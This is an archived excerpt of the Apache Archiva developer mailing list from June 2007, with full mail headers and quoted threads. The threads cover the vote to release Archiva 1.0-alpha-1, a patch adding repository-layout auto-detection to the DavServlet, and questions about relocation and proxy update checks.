Smoak (sorta): > The 1.0-alpha-1 staged copy was setup and configured to point to > a pre-built repository, and then used to build the next archiva > snapshot (1.0-alpha-2-SNAPSHOT) in archiva/trunk. > > This will be Archiva's first release with a proper database, and > is intended to get a testable baseline of the archiva feature set > into the hands of all interested individuals. > > The list of issues identified and closed with this release can > be found below: > > Archiva 1.0-alpha-1 Release Notes: > > http://jira.codehaus.org/secure/ReleaseNote.jspa?projectId=10980&styleName=Html&version=13443 > > > This is an alpha release, and as such, has bugs. > > Once people have a chance to kick the prototype tires, and look around, > the most urgent jira tickets will be addressed quickly for a 1.0-alpha-2 > release, with an expected release 1 to 2 weeks after this one. > > Known issues include documentation, problems with proxying, problems > running the webapp on Tomcat, missing reporting, empty or inaccurate > dependency tree information, and poor grammar. > These and other issues can be tracked at the URL below: > > Archiva 1.0-alpha-2 Open Issues: > http://jira.codehaus.org/secure/IssueNavigator.jspa?reset=true&mode=hide&sorter/order=DESC&sorter/field=priority&resolution=-1&pid=10980&fixfor=13518 > > > Once you have had a chance to examine the distribution, please cast > your vote. We welcome votes and feedback from all community members. > > [ ] +1 Release it! > [ ] 0 > [ ] -1 Don't release it, because... > > 72 hours ends Monday afternoon (GMT -5) > If you need more time, just ask. > -- - Joakim Erdfelt Committer and PMC Member, Apache Maven Archiva Developer [email protected] [email protected] Alpaca Founding Member From [email protected] Tue Jun 05 09:26:02 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6003 invoked from network); 5 Jun 2007 09:26:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2007 09:26:01 -0000 Received: (qmail 48987 invoked by uid 500); 5 Jun 2007 09:26:05 -0000 Delivered-To: [email protected] Received: (qmail 48953 invoked by uid 500); 5 Jun 2007 09:26:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48943 invoked by uid 99); 5 Jun 2007 09:26:04 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 02:26:04 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ik-out-1112.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 02:26:00 -0700 Received: by ik-out-1112.google.com with SMTP id c30so1004756ika for <[email protected]>; Tue, 05 Jun 2007 02:25:38 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=q2F00Zj3zl02DKLLG5qtL11AyVo6X/DG5S7oMsFBTTI7NDP4DWQsg8BYplg7+n4+lHLcOusRG4I8T72eFlF9YepgG3lcwHjC5PehfDAD/fFbRZxSBBE76N55ZnsAU8oOquKof7GibLmHsa/Ws07FfTRyQt74+ofTaGO1tQKvMMY= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=fRMXiufO4ZudIXwX6/YgFhTzGErvLsDvES35l9QQbyIf9o6OWdO2gc+tJYJ/FVY9KOjO+TyALT4GG7vXXQHrm7dqDUzRTtcm3NnSGQEPRlOQP2xCjwIEW2NLyrKUHbomS4UK/nfFHk/2HiEFdm22q8+SZ5oGQrXvwJuFlfwaByE= Received: by 161.129.204.104 with SMTP id e8mr2375346hud.1181035538453; Tue, 05 Jun 2007 02:25:38 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 5 Jun 2007 02:25:38 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 5 Jun 2007 11:25:38 +0200 From: "nicolas de loof" <[email protected]> To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-1 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_15597_9711203.1181035538420" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_15597_9711203.1181035538420 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline I just submitted MRM-412 and attached a patch. This issue adds support for any layout to the DavServlet : Requesting "/javax.servlet/jars/servlet-api-2.3.jar" or "/javax/servlet/servlet-api/2.3/servlet-api-2.3.jar" will auto-detect the layout used for the request (based on configured layouts in archiva) and use it to build the ArchivaArtifact object. This requires the BidirectionalRepositoryLayout interface to be enhanced to add detection of valid path. please review. I also notice the ProxiedDavServer does check for the requested file to exist in managed repo before trying to proxy it. Doesn't this bypass any update strategy configured in proxies ? Perhaps I missed something ? 2007/6/4, Joakim Erdfelt <[email protected]>: > > doh! *I* never voted on this. :-) > > +1 to release. > > - Joakim > > Joakim Erdfelt wrote: > > Archiva 1.0-alpha-1 was tagged and built this afternoon. > > > > The proposed distribution, including binary distributions, and > > signatures can be found here: > > > > http://people.apache.org/builds/maven/archiva/1.0-alpha-1/ > > > > To keep up with the trend started by Wendy Smoak (sorta): > > The 1.0-alpha-1 staged copy was setup and configured to point to > > a pre-built repository, and then used to build the next archiva > > snapshot (1.0-alpha-2-SNAPSHOT) in archiva/trunk. > > > > This will be Archiva's first release with a proper database, and > > is intended to get a testable baseline of the archiva feature set > > into the hands of all interested individuals. > > > > The list of issues identified and closed with this release can > > be found below: > > > > Archiva 1.0-alpha-1 Release Notes: > > > > > http://jira.codehaus.org/secure/ReleaseNote.jspa?projectId=10980&styleName=Html&version=13443 > > > > > > This is an alpha release, and as such, has bugs. > > > > Once people have a chance to kick the prototype tires, and look around, > > the most urgent jira tickets will be addressed quickly for a 1.0-alpha-2 > > release, with an expected release 1 to 2 weeks after this one. > > > > Known issues include documentation, problems with proxying, problems > > running the webapp on Tomcat, missing reporting, empty or inaccurate > > dependency tree information, and poor grammar. > > These and other issues can be tracked at the URL below: > > > > Archiva 1.0-alpha-2 Open Issues: > > > http://jira.codehaus.org/secure/IssueNavigator.jspa?reset=true&mode=hide&sorter/order=DESC&sorter/field=priority&resolution=-1&pid=10980&fixfor=13518 > > > > > > Once you have had a chance to examine the distribution, please cast > > your vote. We welcome votes and feedback from all community members. > > > > [ ] +1 Release it! > > [ ] 0 > > [ ] -1 Don't release it, because... > > > > 72 hours ends Monday afternoon (GMT -5) > > If you need more time, just ask. > > > > > -- > - Joakim Erdfelt > Committer and PMC Member, Apache Maven > Archiva Developer > [email protected] > [email protected] > Alpaca Founding Member > > ------=_Part_15597_9711203.1181035538420-- From [email protected] Tue Jun 05 10:32:10 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26525 invoked from network); 5 Jun 2007 10:32:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2007 10:32:09 -0000 Received: (qmail 32041 invoked by uid 500); 5 Jun 2007 10:32:13 -0000 Delivered-To: [email protected] Received: (qmail 31933 invoked by uid 500); 5 Jun 2007 10:32:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 31924 invoked by uid 99); 5 Jun 2007 10:32:12 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 03:32:12 -0700 X-ASF-Spam-Status: No, hits=2.6 required=10.0 tests=HTML_00_10,HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 03:32:07 -0700 Received: by ug-out-1314.google.com with SMTP id 34so140612ugf for <[email protected]>; Tue, 05 Jun 2007 03:31:46 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type; b=BgGcHnJs5e+sJ/rFWuk7/XpbFtbksPkyoVc5SwW+/oa+nYDyIYicqTIyCf+SD6h5VYBQYidj/bSn75EgXCYA/tbRH1K0oaTYuNsHoAKG8PTlAejR6ve/8LGurCC3koPXcjkjPsTyEsYfUt1FRL7KeWMSY9lOFwBuaTIDLvTxhwo= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type; b=uCtpOFPVdolrddsubST2acZUmPfBaf+XRt6seFPRYJlbLsuGFW5oVd+ramhkGznkV1Pe53bNSaQRPb6KUIzCRquFEfrBFG+0MhgUP7nS+RVf4uwVji2I+ly8mnjqX27TNhlCCZYIvRhsoWZrZfiidOpfhtV4m1O7AE0eL2mKb8o= Received: by 161.129.204.104 with SMTP id g15mr2376916hub.1181039505909; Tue, 05 Jun 2007 03:31:45 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 5 Jun 2007 03:31:45 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 5 Jun 2007 12:31:45 +0200 From: "nicolas de loof" <[email protected]> To: [email protected] Subject: adding relocation support MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_16215_2923693.1181039505893" X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_16215_2923693.1181039505893 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline I'd like to add support for archiva-side relocation for maven1 (as in archiva 0.9) this requires to get the requested artifact POM and override the ArtifactReference object prior to fetching the proxy-connectors. As the ProxiedDavServer make the call to connectors I'll have to place this relocation-handling code in the ProxiedDavServer, that may not be the better place. What architecture would you suggest for an "artifact pre-processor" used as an interceptor between the DavServer and the managedRepository and it's proxies ? Nico. ------=_Part_16215_2923693.1181039505893-- From [email protected] Tue Jun 05 11:55:11 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52069 invoked from network); 5 Jun 2007 11:55:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2007 11:55:10 -0000 Received: (qmail 69499 invoked by uid 500); 5 Jun 2007 11:51:38 -0000 Delivered-To: [email protected] Received: (qmail 69473 invoked by uid 500); 5 Jun 2007 11:51:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 69464 invoked by uid 99); 5 Jun 2007 11:51:38 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 04:51:38 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.sventech.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 04:51:33 -0700 Received: from mail.sventech.com (localhost.localdomain [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id F1B794803C for <[email protected]>; Tue, 5 Jun 2007 11:51:11 +0000 (UTC) Received: from [161.129.204.104] (c-71-59-8-58.hsd1.ga.comcast.net [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 930EA4801A for <[email protected]>; Tue, 5 Jun 2007 11:51:11 +0000 (UTC) Message-ID: <[email protected]> Date: Tue, 05 Jun 2007 07:57:05 -0400 From: Joakim Erdfelt <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070501) MIME-Version: 1.0 To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-1 References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org MRM-412 will make it into Archiva 1.0-alpha-2 thanks! As for the check for the requested file issue, yes that is a mistake, likely left over from an earlier time, when things were more chaotic, a time when great herds of horned alpacas roamed the earth. - Joakim nicolas de loof wrote: > I just submitted MRM-412 and attached a patch. > > This issue adds support for any layout to the DavServlet : > Requesting "/javax.servlet/jars/servlet-api-2.3.jar" or > "/javax/servlet/servlet-api/2.3/servlet-api-2.3.jar" will auto-detect the > layout used for the request (based on configured layouts in archiva) > and use > it to build the ArchivaArtifact object. > This requires the BidirectionalRepositoryLayout interface to be > enhanced to > add detection of valid path. > > please review. > > > I also notice the ProxiedDavServer does check for the requested file to > exist in managed repo before trying to proxy it. Doesn't this bypass any > update strategy configured in proxies ? Perhaps I missed something ? > > > 2007/6/4, Joakim Erdfelt <[email protected]>: >> >> doh! *I* never voted on this. :-) >> >> +1 to release. >> >> - Joakim >> >> Joakim Erdfelt wrote: >> > Archiva 1.0-alpha-1 was tagged and built this afternoon. >> > >> > The proposed distribution, including binary distributions, and >> > signatures can be found here: >> > >> > http://people.apache.org/builds/maven/archiva/1.0-alpha-1/ >> > >> > To keep up with the trend started by Wendy Smoak (sorta): >> > The 1.0-alpha-1 staged copy was setup and configured to point to >> > a pre-built repository, and then used to build the next archiva >> > snapshot (1.0-alpha-2-SNAPSHOT) in archiva/trunk. >> > >> > This will be Archiva's first release with a proper database, and >> > is intended to get a testable baseline of the archiva feature set >> > into the hands of all interested individuals. >> > >> > The list of issues identified and closed with this release can >> > be found below: >> > >> > Archiva 1.0-alpha-1 Release Notes: >> > >> > >> http://jira.codehaus.org/secure/ReleaseNote.jspa?projectId=10980&styleName=Html&version=13443 >> >> > >> > >> > This is an alpha release, and as such, has bugs. >> > >> > Once people have a chance to kick the prototype tires, and look >> around, >> > the most urgent jira tickets will be addressed quickly for a >> 1.0-alpha-2 >> > release, with an expected release 1 to 2 weeks after this one. >> > >> > Known issues include documentation, problems with proxying, problems >> > running the webapp on Tomcat, missing reporting, empty or inaccurate >> > dependency tree information, and poor grammar. >> > These and other issues can be tracked at the URL below: >> > >> > Archiva 1.0-alpha-2 Open Issues: >> > >> http://jira.codehaus.org/secure/IssueNavigator.jspa?reset=true&mode=hide&sorter/order=DESC&sorter/field=priority&resolution=-1&pid=10980&fixfor=13518 >> >> > >> > >> > Once you have had a chance to examine the distribution, please cast >> > your vote. We welcome votes and feedback from all community members. >> > >> > [ ] +1 Release it! >> > [ ] 0 >> > [ ] -1 Don't release it, because... >> > >> > 72 hours ends Monday afternoon (GMT -5) >> > If you need more time, just ask. >> > >> >> >> -- >> - Joakim Erdfelt >> Committer and PMC Member, Apache Maven >> Archiva Developer >> [email protected] >> [email protected] >> Alpaca Founding Member From [email protected] Tue Jun 05 12:07:56 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56774 invoked from network); 5 Jun 2007 12:07:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2007 12:07:55 -0000 Received: (qmail 16873 invoked by uid 500); 5 Jun 2007 12:07:59 -0000 Delivered-To: [email protected] Received: (qmail 16837 invoked by uid 500); 5 Jun 2007 12:07:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 16828 invoked by uid 99); 5 Jun 2007 12:07:59 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 05:07:59 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 05:07:53 -0700 Received: by ug-out-1314.google.com with SMTP id 34so162259ugf for <[email protected]>; Tue, 05 Jun 2007 05:07:32 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=d6ZnSmg+BfseyBfueIC88VMBDKU8HtJIKgCfwYKQOR2SlhvbMbBuJyN6+HD6TnQPRPwnI1OweqS9J3Tm9SAXCDJS3LP0cWKRsjcSymKoIHOcB/oMw8nlMQ+u4y++5aype0G4HePGE0EB4hwQW5TA/OYL9iVP0wsl6pmBGETp+yg= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=BnLkFRXQHtcJFlg9Qwe+LCtC2C2P1VAoAznD1Hhq01ETRrnizqPO0Z82MHXP+Iv3iC/xdcYuZhv1LBNCu7oSsYtnqfivbwPRGRwSohtXNeBVevL9gKuZHdBA2MF3fkeIAPMCQGDPOGaHGiGpp8hnisF+MJ258ev5T1kKdX1rG8w= Received: by 161.129.204.104 with SMTP id v4mr2421328huc.1181045251689; Tue, 05 Jun 2007 05:07:31 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 5 Jun 2007 05:07:31 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 5 Jun 2007 14:07:31 +0200 From: "nicolas de loof" <[email protected]> To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-1 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_17297_25814091.1181045251625" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_17297_25814091.1181045251625 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline I allready noticed this no-update-check issue on 0.9 in MRM-320, but maybe I wasn't clear as it was closed as "won't fix". I'm looking for a clean way to pre-process the DAV request before proxies connectors get fetched. This could include the legacy -> default (or any other) request path layout conversion. For now, the only way I've found is to add some code in ProxiedDavServer. Could ArtifactReference, VersionedReference and ProjectReference share an ancestor so that we can refactor BidirectionalRepositoryLayout to only provide toReference(path) and toPath(Reference) ? This would avoid having similar try/catch 3 times. 2007/6/5, Joakim Erdfelt <[email protected]>: > > MRM-412 will make it into Archiva 1.0-alpha-2 thanks! > > As for the check for the requested file issue, yes that is a mistake, > likely left over from an earlier time, when things were more chaotic, a > time when great herds of horned alpacas roamed the earth. > > - Joakim > > nicolas de loof wrote: > > I just submitted MRM-412 and attached a patch. > > > > This issue adds support for any layout to the DavServlet : > > Requesting "/javax.servlet/jars/servlet-api-2.3.jar" or > > "/javax/servlet/servlet-api/2.3/servlet-api-2.3.jar" will auto-detect > the > > layout used for the request (based on configured layouts in archiva) > > and use > > it to build the ArchivaArtifact object. > > This requires the BidirectionalRepositoryLayout interface to be > > enhanced to > > add detection of valid path. > > > > please review. > > > > > > I also notice the ProxiedDavServer does check for the requested file to > > exist in managed repo before trying to proxy it. Doesn't this bypass any > > update strategy configured in proxies ? Perhaps I missed something ? > > > > > > 2007/6/4, Joakim Erdfelt <[email protected]>: > >> > >> doh! *I* never voted on this. :-) > >> > >> +1 to release. > >> > >> - Joakim > >> > >> Joakim Erdfelt wrote: > >> > Archiva 1.0-alpha-1 was tagged and built this afternoon. > >> > > >> > The proposed distribution, including binary distributions, and > >> > signatures can be found here: > >> > > >> > http://people.apache.org/builds/maven/archiva/1.0-alpha-1/ > >> > > >> > To keep up with the trend started by Wendy Smoak (sorta): > >> > The 1.0-alpha-1 staged copy was setup and configured to point to > >> > a pre-built repository, and then used to build the next archiva > >> > snapshot (1.0-alpha-2-SNAPSHOT) in archiva/trunk. > >> > > >> > This will be Archiva's first release with a proper database, and > >> > is intended to get a testable baseline of the archiva feature set > >> > into the hands of all interested individuals. > >> > > >> > The list of issues identified and closed with this release can > >> > be found below: > >> > > >> > Archiva 1.0-alpha-1 Release Notes: > >> > > >> > > >> > http://jira.codehaus.org/secure/ReleaseNote.jspa?projectId=10980&styleName=Html&version=13443 > >> > >> > > >> > > >> > This is an alpha release, and as such, has bugs. > >> > > >> > Once people have a chance to kick the prototype tires, and look > >> around, > >> > the most urgent jira tickets will be addressed quickly for a > >> 1.0-alpha-2 > >> > release, with an expected release 1 to 2 weeks after this one. > >> > > >> > Known issues include documentation, problems with proxying, problems > >> > running the webapp on Tomcat, missing reporting, empty or inaccurate > >> > dependency tree information, and poor grammar. > >> > These and other issues can be tracked at the URL below: > >> > > >> > Archiva 1.0-alpha-2 Open Issues: > >> > > >> > http://jira.codehaus.org/secure/IssueNavigator.jspa?reset=true&mode=hide&sorter/order=DESC&sorter/field=priority&resolution=-1&pid=10980&fixfor=13518 > >> > >> > > >> > > >> > Once you have had a chance to examine the distribution, please cast > >> > your vote. We welcome votes and feedback from all community members. > >> > > >> > [ ] +1 Release it! > >> > [ ] 0 > >> > [ ] -1 Don't release it, because... > >> > > >> > 72 hours ends Monday afternoon (GMT -5) > >> > If you need more time, just ask. > >> > > >> > >> > >> -- > >> - Joakim Erdfelt > >> Committer and PMC Member, Apache Maven > >> Archiva Developer > >> [email protected] > >> [email protected] > >> Alpaca Founding Member > > ------=_Part_17297_25814091.1181045251625-- From [email protected] Tue Jun 05 13:11:33 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75489 invoked from network); 5 Jun 2007 13:11:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2007 13:11:32 -0000 Received: (qmail 54557 invoked by uid 500); 5 Jun 2007 13:11:35 -0000 Delivered-To: [email protected] Received: (qmail 54515 invoked by uid 500); 5 Jun 2007 13:11:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 54506 invoked by uid 99); 5 Jun 2007 13:11:35 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 06:11:35 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.sventech.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 06:11:30 -0700 Received: from mail.sventech.com (localhost.localdomain [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id C8FEA4803C for <[email protected]>; Tue, 5 Jun 2007 13:11:09 +0000 (UTC) Received: from [161.129.204.104] (c-71-59-8-58.hsd1.ga.comcast.net [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 7902F4801A for <[email protected]>; Tue, 5 Jun 2007 13:11:09 +0000 (UTC) Message-ID: <[email protected]> Date: Tue, 05 Jun 2007 09:17:04 -0400 From: Joakim Erdfelt <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070501) MIME-Version: 1.0 To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-1 References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org I don't like hooking up the webdav interface into the dynamic artifact serving. I think we need to investigate the DASL layer idea in the Archiva Roadmap, maybe move it up in priority. http://docs.codehaus.org/display/MAVENUSER/Archiva+Roadmap - Joakim nicolas de loof wrote: > I allready noticed this no-update-check issue on 0.9 in MRM-320, but > maybe I > wasn't clear as it was closed as "won't fix". > > I'm looking for a clean way to pre-process the DAV request before proxies > connectors get fetched. This could include the legacy -> default (or any > other) request path layout conversion. For now, the only way I've > found is > to add some code in ProxiedDavServer. > > Could ArtifactReference, VersionedReference and ProjectReference share an > ancestor so that we can refactor BidirectionalRepositoryLayout to only > provide toReference(path) and toPath(Reference) ? This would avoid having > similar try/catch 3 times. > > > > 2007/6/5, Joakim Erdfelt <[email protected]>: >> >> MRM-412 will make it into Archiva 1.0-alpha-2 thanks! >> >> As for the check for the requested file issue, yes that is a mistake, >> likely left over from an earlier time, when things were more chaotic, a >> time when great herds of horned alpacas roamed the earth. >> >> - Joakim >> >> nicolas de loof wrote: >> > I just submitted MRM-412 and attached a patch. >> > >> > This issue adds support for any layout to the DavServlet : >> > Requesting "/javax.servlet/jars/servlet-api-2.3.jar" or >> > "/javax/servlet/servlet-api/2.3/servlet-api-2.3.jar" will auto-detect >> the >> > layout used for the request (based on configured layouts in archiva) >> > and use >> > it to build the ArchivaArtifact object. >> > This requires the BidirectionalRepositoryLayout interface to be >> > enhanced to >> > add detection of valid path. >> > >> > please review. >> > >> > >> > I also notice the ProxiedDavServer does check for the requested >> file to >> > exist in managed repo before trying to proxy it. Doesn't this >> bypass any >> > update strategy configured in proxies ? Perhaps I missed something ? >> > >> > >> > 2007/6/4, Joakim Erdfelt <[email protected]>: >> >> >> >> doh! *I* never voted on this. :-) >> >> >> >> +1 to release. >> >> >> >> - Joakim >> >> >> >> Joakim Erdfelt wrote: >> >> > Archiva 1.0-alpha-1 was tagged and built this afternoon. >> >> > >> >> > The proposed distribution, including binary distributions, and >> >> > signatures can be found here: >> >> > >> >> > http://people.apache.org/builds/maven/archiva/1.0-alpha-1/ >> >> > >> >> > To keep up with the trend started by Wendy Smoak (sorta): >> >> > The 1.0-alpha-1 staged copy was setup and configured to point to >> >> > a pre-built repository, and then used to build the next archiva >> >> > snapshot (1.0-alpha-2-SNAPSHOT) in archiva/trunk. >> >> > >> >> > This will be Archiva's first release with a proper database, and >> >> > is intended to get a testable baseline of the archiva feature set >> >> > into the hands of all interested individuals. >> >> > >> >> > The list of issues identified and closed with this release can >> >> > be found below: >> >> > >> >> > Archiva 1.0-alpha-1 Release Notes: >> >> > >> >> > >> >> >> http://jira.codehaus.org/secure/ReleaseNote.jspa?projectId=10980&styleName=Html&version=13443 >> >> >> >> >> > >> >> > >> >> > This is an alpha release, and as such, has bugs. >> >> > >> >> > Once people have a chance to kick the prototype tires, and look >> >> around, >> >> > the most urgent jira tickets will be addressed quickly for a >> >> 1.0-alpha-2 >> >> > release, with an expected release 1 to 2 weeks after this one. >> >> > >> >> > Known issues include documentation, problems with proxying, >> problems >> >> > running the webapp on Tomcat, missing reporting, empty or >> inaccurate >> >> > dependency tree information, and poor grammar. >> >> > These and other issues can be tracked at the URL below: >> >> > >> >> > Archiva 1.0-alpha-2 Open Issues: >> >> > >> >> >> http://jira.codehaus.org/secure/IssueNavigator.jspa?reset=true&mode=hide&sorter/order=DESC&sorter/field=priority&resolution=-1&pid=10980&fixfor=13518 >> >> >> >> >> > >> >> > >> >> > Once you have had a chance to examine the distribution, please cast >> >> > your vote. We welcome votes and feedback from all community >> members. >> >> > >> >> > [ ] +1 Release it! >> >> > [ ] 0 >> >> > [ ] -1 Don't release it, because... >> >> > >> >> > 72 hours ends Monday afternoon (GMT -5) >> >> > If you need more time, just ask. >> >> > >> >> >> >> >> >> -- >> >> - Joakim Erdfelt >> >> Committer and PMC Member, Apache Maven >> >> Archiva Developer >> >> [email protected] >> >> [email protected] >> >> Alpaca Founding Member From [email protected] Tue Jun 05 13:37:49 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90327 invoked from network); 5 Jun 2007 13:37:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2007 13:37:48 -0000 Received: (qmail 19188 invoked by uid 500); 5 Jun 2007 13:37:51 -0000 Delivered-To: [email protected] Received: (qmail 19136 invoked by uid 500); 5 Jun 2007 13:37:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 19127 invoked by uid 99); 5 Jun 2007 13:37:51 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 06:37:51 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 06:37:47 -0700 